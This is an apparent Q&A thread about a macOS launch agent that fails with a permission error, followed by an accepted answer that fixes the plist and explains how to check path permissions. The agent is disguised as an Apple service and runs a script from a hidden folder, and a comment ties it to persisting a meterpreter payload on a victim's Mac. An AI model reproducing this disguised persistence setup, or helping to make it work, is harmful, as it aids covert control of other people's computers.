# Launch agent invoking python script returns permission error

Tags: macos, command-line, launchd, python, plist

I'm trying to use the following `.plist` to invoke a python script.

```
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs PropertyList-1.0.dtd">
<plist version="1.0">
    <dict>
        <key>KeepAlive</key>
        <true/>
        <key>Label</key>
        <string>com.apple.inMemTask14</string>
        <key>ProgramArguments</key>
        <array>
            <string>/Users/open/Library/Containers/.heheOSX/MacOSHighSierra.py</string>
        </array>
        <key>StartInterval</key>
        <integer>300</integer>  
    </dict>
</plist>
```

For some reason when I execute:

`launchctl load -w /Users/open/Library/LaunchAgents/com.apple.inMemTask14.plist`

I get the following errors in my system.log:

```
Mar 27 11:39:19 openZ-MacBook-Pro com.apple.xpc.launchd[1] (com.apple.inMemTask14): This service is defined to be constantly running and is inherently inefficient.
Mar 27 11:39:19 openZ-MacBook-Pro com.apple.xpc.launchd[1] (com.apple.inMemTask14[1335]): Could not find and/or execute program specified by service: 13: Permission denied: /Users/open/Library/Containers/.heheOSX/MacOSHighSierra.py
Mar 27 11:39:19 openZ-MacBook-Pro com.apple.xpc.launchd[1] (com.apple.inMemTask14[1335]): Service setup event to handle failure and will not launch until it fires.
```

I have given execute permission to the python script. Is there something wrong with my `.plist`? How can I fix the errors displayed in the logs?

Comment: Related: [I’m using a web delivery method to deliver a python meterpreter payload on victim Mac Os machine. My problem is that I want to use the python script that downloads the payload to persist.](https://0x00sec.org/t/python-meterpreter-persistence-in-mac-os/6039) ;-)

Answer (score 1, accepted):

You have one error and a minor one in your plist and probably one inconsistency in your file system:

Keeping a job alive no matter what **and** starting the same job every 5 minutes is like being forced to stay in the bathroom **and** going to the bathroom every five minutes because of ... an [ablutomania](https://en.wiktionary.org/wiki/ablutomania).

So remove the part:

```
    <key>KeepAlive</key>
    <true/>
```

Add the python bin in the program arguments:

replace:

```
<key>ProgramArguments</key>
<array>
    <string>/Users/open/Library/Containers/.heheOSX/MacOSHighSierra.py</string>
</array>
```

with:

```
<key>ProgramArguments</key>
<array>
    <string>/usr/bin/python</string>
    <string>/Users/open/Library/Containers/.heheOSX/MacOSHighSierra.py</string>
</array>
```

If you prefer another python bin (e.g. some brew/python), use this one instead.

Finally make sure that the logged in user (i.e. the one launching the agent) has at least read access to */Users/open/Library/Containers/.heheOSX/MacOSHighSierra.py*!

---

Regarding the last problem:

I use the following alias in my .bash_profile to get all permissions/ACLs of a path:

```
alias lspath='(IFS=/; set -f -- $PWD; for arg; do path="${path%/}/$arg"; paths+=("$path"); done; ls -dlaOe@ "${paths[@]}")'
```

Entering lspath after cd'ing to a folder will reveal all permissions/ACLs:

```
$ cd /Users/user1/Library/Containers/.heheOSX
$ lspath
drwxr-xr-x  39 root   wheel  - 1394 27 Mär 17:44 /
drwxr-xr-x   7 root   admin  -  238  5 Aug  2014 /Users
drwxr-xr-x+ 60 user1  staff  - 2040 26 Mär 23:58 /Users/user1
 0: group:everyone deny delete
drwx------+ 72 user1  staff  - 2448 16 Mär 00:40 /Users/user1/Library
 0: group:everyone deny delete
drwx------  57 user1  staff  - 1938 27 Mär 20:26 /Users/user1/Library/Containers
drwxr-xr-x   2 user1  staff  -   68 27 Mär 20:26 /Users/user1/Library/Containers/.heheOSX
```

In this example no other user except *user1* (and *root*) will be able to launch/load a *.py in /Users/user1/Library/Containers/.heheOSX because other users can't traverse neither */Users/user1/Library* nor */Users/user1/Library/Containers* because of their restrictive drwx------ permissions.